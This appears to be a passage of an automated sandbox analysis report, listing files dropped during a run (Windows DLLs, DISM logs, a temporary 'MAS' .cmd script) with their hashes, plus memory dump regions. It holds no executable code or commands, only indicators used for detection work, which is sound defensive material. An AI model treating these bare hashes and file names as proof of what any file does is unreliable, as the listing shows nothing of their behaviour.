e5de47efa25756e39419dfce2f3d4f9ceb0f1ef323d4220215af43951d7ac3c412555ed19be825fe5238df1ee9b5f1b2b38c27548a7fc4f710f209c21a451489

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-kernel32-legacy-l1-1-0.dll

Filesize
13KB

MD5
5697347f82925a92ffcd79baf1ef7f70

SHA1
03a3585e36f37bfe582783df151f0423152ec42d

SHA256
354602a889f9080628ec5f42f0e5f1dfcb2bff0d3d1380e677192a62a6a0a38d

SHA512
6c05163a3e4bd16ecd6df15cf4a824b4e4c42342c5d71862f4c651707cc8e6c212bfebd227e2a724e5f599f4fcaa4906b75f0297c9fd322359a785d0867a0e24

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-kernel32-legacy-l1-1-1.dll

Filesize
11KB

MD5
d2206a386a018164f8356da4e4b28491

SHA1
da8b49a5cc25a62973859abda1c9321ce90754c1

SHA256
e417a1dc52bcc65c9ab7d7103f7b5aeb542683662e2eb81a62214a783ef3c119

SHA512
17dd2b8b1ab5df03d7b7b8415a3f731760e09749971247f3613d202c82746889a2bf22a31c679fd42e7bc3f9227ee69a724c3d775e11fd0d9ce7cc42f716044c

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
11KB

MD5
99a1e08bbcfeeb97bec6b2134d5b70ee

SHA1
e7da23b2cfe2db8a5a676d065f63992bed0403b2

SHA256
8306019ee028e25917846e27411a9efe872d363afbc3619fbadba959241eb368

SHA512
4e218340f2bf01b8798149ba13104d7adea55ba08d9ab95a81e1ff698b20b1991d1aae584775ed5cd718504297640acdcb863e0ccfd9e9e347459c8d337be74b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-libraryloader-l1-1-1.dll

Filesize
11KB

MD5
cd982e31c511c86bb0628950da4d8303

SHA1
ab300641abaa150a324618ba4ae2d37fcdecb045

SHA256
136be4ce4b4602fd195fd051d804d6f1dfddd50b347d6e1581d02234a4781f46

SHA512
57f4512e85383ee4559a600767843b1890e8caf9e556574630c445902cca3ff4799d3290a0f72bd677aa2ddc899af5ee11bbb966f4bd586642f9bce593bd0451

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-localization-l1-2-0.dll

Filesize
13KB

MD5
73a6e0912e4ef1a40ed63af9bfdd1eed

SHA1
39262d05b37fb6d4e0b96f3a5ea9bda91db95504

SHA256
eb7078b245a5d533bbd4aebb049139a6eab49984f8207ba428845e107ff836bb

SHA512
470fa2cdca0cd2e2710de170f54e098c5de2d2904c91eb417d2eac5a628520f82072fd02e55b4605b90184949e3c18e7b8c8f50c7dbe225282ed9d076d461117

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-localization-l1-2-1.dll

Filesize
10KB

MD5
5852a8cf81becfe55d30e0848bb13d0b

SHA1
80108231976a666667db81dfe8d3abb50b7d6bd9

SHA256
a38ba34821c33bd8be6d2a75653967df10197cd44914f7d3d17109ccd2f48830

SHA512
4edd1588eaafff1d6d90a22869bfa10491b1e16b9c3fc762205c96f80fc8fbab2c4d18de28d04c0f57eb47c423e6388ba89595e6df97ad6d80853af8c28295cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-memory-l1-1-0.dll

Filesize
11KB

MD5
8b2beaabeaf86415c5c3d6363953bef2

SHA1
2eccc9637b26d6c6249d26c852aa77e7505812b0

SHA256
536ecdf4d6e0480d6745b3aaf9f3daa81ab8eb94edcad9f804df3739197f0824

SHA512
c74cdeabd8f5d68cf0265433fc27bdf9e0e85b2ef154be4591986e3d82861e6dcf83d1883ce5edf5c6e83d2cee544dca4570ef880cc4fb01c5a88a58a6aaec3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-memory-l1-1-1.dll

Filesize
11KB

MD5
23698ae15b0b46c328651c8de3b2b8c6

SHA1
4a96018ff5fb4e2251d5e835e21d09e7a4591497

SHA256
e5e02a5a038d004e469d37107a321365205fb541eabd6f6519234256e1b8b4a4

SHA512
d2b27005df946e7344feaba4d0a7bec85e8a4cbf9465941ec45dc82df4e779357202b2ef7cc64378d799f6b159d97f9e30ebd4f79955914097aacd5dc32e4f09

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-memory-l1-1-2.dll

Filesize
11KB

MD5
259e9666d43ca9ba1cd7ed01682e7605

SHA1
41f367cd94ca19d71654ada0fa696039958804a4

SHA256
6e823471a9aea31792c4b4b038e7742b9eced99840baeff0635808e1e290a811

SHA512
869fb1e7868dca7152235f0ab723971449187561f28efc7ee826e7ad97aecee1f8d873dddb61d39c19820cb891801706867f764b2ab1c61ec45aefccfdd476a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-namedpipe-l1-1-0.dll

Filesize
11KB

MD5
a45d01b40f4b9c7ee0fcb0065a017b01

SHA1
ee57d83573a98ab6c4cfe6f67df541c0271067fb

SHA256
e22f01815f98d518575ac7f13570331664929bdd75ba6b811e80b4e4585bf444

SHA512
dd99592d4e9520bd4af1406427d46e989dc75f53bfae3fb84b6c0f32a338f4b353f39a232345c5507d3669f3816403eea78d07ce5ad3678be81b73795da2e2b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-privateprofile-l1-1-0.dll

Filesize
11KB

MD5
459cecec233ec63c377c2ba4d7d1733d

SHA1
71983e49f56dafd4fde05c03d2286f69b599a8bf

SHA256
59699a5887a5376e2b426f6567e542de2edf114f6ed4ddfb1b26bc955e173277

SHA512
39449f3b08d7e303830542cb23e53fff1b16cada3a1df8eef1396ed40d407fb5a122fc16fdf1f9d2e4a59efe924526eb659a5b958b15a2b370fa106a5f5f73f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-privateprofile-l1-1-1.dll

Filesize
10KB

MD5
91c9f3bd09c6131631e5f8bd3c5c2d9e

SHA1
8f1adb51285d877d4afdfc577b727c5ab363c1dd

SHA256
c55650fec2017af2ffc9518fd7aa5a715894fea2ae7eafc9e5ba23a97d1cb6b7

SHA512
66a1d4aa75ac4dc379de5b717c7fc40a892795f7aa3d0241bfd6826424f9c50a0f53846fa814bbcf28c6eb8f406c4797413b0cfcafd437cdaaa732ab6c0665c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-processenvironment-l1-1-0.dll

Filesize
12KB

MD5
f8a7763be52f801bb4ea7e13c77e9068

SHA1
eb2217c3218cc3f2f118861124836a3bdc874e66

SHA256
606402f4864ef46a7acde90c9cab0b452477d8d5948d225dc8f90dff2e6e9e11

SHA512
0861ee5139efbb9f86028cac3a591bf367b7de669ffd4e8b2c25973d35208fa05f81e295398583b0e71ffbe384b2db42b81edc59a2178b32ff38bcdc07510cb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\api-ms-win-core-processenvironment-l1-2-0.dll

Filesize
11KB

MD5
3a4abab2b417bd4690a055eba8c24799

SHA1
bd86dd9cc53b5661d1a366593bf4c2169264640f

SHA256
6d7b5382a11db63e7c3f6b807d6e84bb1ecb1a5c1a47af02d7715a53cffbca2b

SHA512
5fc6399d59058a697c30152c7fba679c173e6fbc104d710141babd8187bf1302f38d9ecc7a743b5661aee480c2973ded0efcc487cb7ffec44b0c8920fbf3b3db

Download Submit
C:\Users\Admin\AppData\Local\Temp\A8DA5B3F-BDC6-4422-9978-8D5998006201\dismprov.dll

Filesize
242KB

MD5
2737782245a1d166a1f018b368815a16

SHA1
4fd57e0de191c817a733d07138c43ce9a010d64c

SHA256
498c301c9b5dfc36f1031988cb4a440ab17effd606345abd506a807f277b1938

SHA512
7830d377ae880183a2e51a9d557bf0fa324913df28b12f5d7aca815fb2e8a6b0373d76f36877f28cba4ce8bff32da62309fcdcb8ff3930c5f8a54963b7cfdeff

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uzsa1b13.udr.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
5KB

MD5
fcd236547a96f8fd2ab2fe8e574d64ec

SHA1
b27fb1292de4ae461d1a1f6ea326d13152eed6e0

SHA256
bc1c979e43d8710576ad9a6e8cd64de6755795f7add1013ee4c2964a224ddd82

SHA512
31a6473945743ace512161adca8547ee9cb7c36c7ff6af1917f60d64f9cce27a817f2e157bc59b5f8fd2ed6f3e1f57ee093a4f9f9d19eac8d585b8414a83e23a

Download Submit
C:\Windows\Logs\DISM\dism.log

Filesize
220KB

MD5
d30c76ddb309eace9f199956921ed44f

SHA1
daf30051b99e52bf46ac85e24b4112588ee75ce8

SHA256
0e0b9870a507b971303d7ba3ac46975be88d912f87ff34fcdf850443c7b3ccb9

SHA512
56b9ce56f1fd8d78158fe67eb25912f8efe1fd0c077d5426dcaf3dde9d0445314e5d06c0dde360c60b2e7aaa0429cfea109a3bcc36410f797510e0052314aa58

Download Submit
C:\Windows\Logs\DISM\dism.log

Filesize
241KB

MD5
c20fd95523215c62dc70d71fd92bb367

SHA1
210bac601d230e573f285672e8268d2e86245025

SHA256
f30cba2973b13f6cdcfb0002bd762db6c825348232cbc12f876ad74455dcd10e

SHA512
0b0a49f5afb7b416dfa486f26e58b5300a48d52437d54b63779df49cac7b6a9c1a730559145cbbca0d2a94011a788f4ed36fe54411185f855018286fc1ec9930

Download Submit
C:\Windows\Temp\MAS_49734917.cmd

Filesize
438KB

MD5
2013bc12ee95f6c366efa046cc3c28e1

SHA1
555d8e072c53876c5c9280b93e32722554af2cff

SHA256
d984c87c032a60e1a97a827c909792e5394eab80b5813d96a0bf01fff358a05d

SHA512
df1e6024228d3310b2848ae36edd62a3b127bf514b2f5e841e8ad81981173f92c8f713211cbe4db7cbaf95d0aaa1401638767e1933d52feea498b2ff2d0032a4

Download Submit
memory/440-45-0x00007FFC53C50000-0x00007FFC53C60000-memory.dmp

Filesize
64KB

Download
memory/440-44-0x0000012EAD4A0000-0x0000012EAD4CA000-memory.dmp

Filesize
168KB

Download
memory/584-22-0x0000026C89920000-0x0000026C89943000-memory.dmp

Filesize
140KB

Download
memory/584-23-0x0000026C89950000-0x0000026C8997A000-memory.dmp

Filesize
168KB

Download
memory/584-24-0x00007FFC53C50000-0x00007FFC53C60000-memory.dmp

Filesize
64KB

Download
memory/640-27-0x0000012A25690000-0x0000012A256BA000-memory.dmp

Filesize
168KB

Download
memory/640-28-0x00007FFC53C50000-0x00007FFC53C60000-memory.dmp

Filesize
64KB

Download
memory/832-48-0x00007FFC53C50000-0x00007FFC53C60000-memory.dmp

Filesize
64KB

Download
memory/832-47-0x000001A9D36B0000-0x000001A9D36DA000-memory.dmp

Filesize
168KB

Download
memory/900-41-0x0000022515BE0000-0x0000022515C0A000-memory.dmp

Filesize
168KB

Download
memory/900-42-0x00007FFC53C50000-0x00007FFC53C60000-memory.dmp

Filesize
64KB

Download
memory/1008-34-0x00007FFC53C50000-0x00007FFC53C60000-memory.dmp

Filesize
64KB

Download
memory/1008-33-0x00000268314D0000-0x00000268314FA000-memory.dmp

Filesize
168KB

Download
memory/1056-50-0x000001CC42310000-0x000001CC4233A000-memory.dmp

Filesize
168KB

Download
memory/1056-51-0x00007FFC53C50000-0x00007FFC53C60000-memory.dmp

Filesize
64KB

Download
memory/1064-53-0x000001BCDD0D0000-0x000001BCDD0FA000-memory.dmp

Filesize
168KB

Download
memory/1064-54-0x00007FFC53C50000-0x00007FFC53C60000-memory.dmp

Filesize
64KB

Download
memory/1900-285-0x0000020972850000-0x0000020972BA8000-memory.dmp

Filesize
3.3MB

Download
memory/1900-0-0x000002096F240000-0x000002096F25E000-memory.dmp

Filesize
120KB

Download
memory/1900-1593-0x00007FFC76190000-0x00007FFC76B7C000-memory.dmp

Filesize
9.9MB

Download
memory/1900-1-0x00007FFC76193000-0x00007FFC76194000-memory.dmp

Filesize
4KB

Download
memory/1900-4-0x0000020972140000-0x0000020972666000-memory.dmp

Filesize
5.1MB

Download
memory/1900-2-0x0000020971860000-0x0000020971A22000-memory.dmp

Filesize
1.8MB

Download
memory/1900-14-0x00007FFC93BC0000-0x00007FFC93D9B000-memory.dmp

Filesize
1.9MB

Download
memory/1900-3-0x00007FFC76190000-0x00007FFC76B7C000-memory.dmp

Filesize
9.9MB

Download
memory/1900-13-0x0000020970E60000-0x0000020970E9E000-memory.dmp

Filesize
248KB

Download
memory/1900-5-0x00007FFC76193000-0x00007FFC76194000-memory.dmp

Filesize
4KB

Download
memory/1900-15-0x00007FFC91130000-0x00007FFC911DE000-memory.dmp

Filesize
696KB

Download
memory/1900-6-0x00007FFC76190000-0x00007FFC76B7C000-memory.dmp

Filesize
9.9MB

Download
memory/2288-491-0x0000025C70800000-0x0000025C7083C000-memory.dmp

Filesize
240KB

Download
memory/2288-502-0x0000025C70D50000-0x0000025C70DC6000-memory.dmp

Filesize
472KB

Download
memory/2288-464-0x0000025C70690000-0x0000025C706B2000-memory.dmp

Filesize
136KB

Download
memory/4260-20-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/4260-17-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/4260-18-0x00007FFC93BC0000-0x00007FFC93D9B000-memory.dmp

Filesize
1.9MB

Download
memory/4260-19-0x00007FFC91130000-0x00007FFC911DE000-memory.dmp

Filesize
696KB

Download
memory/4260-16-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download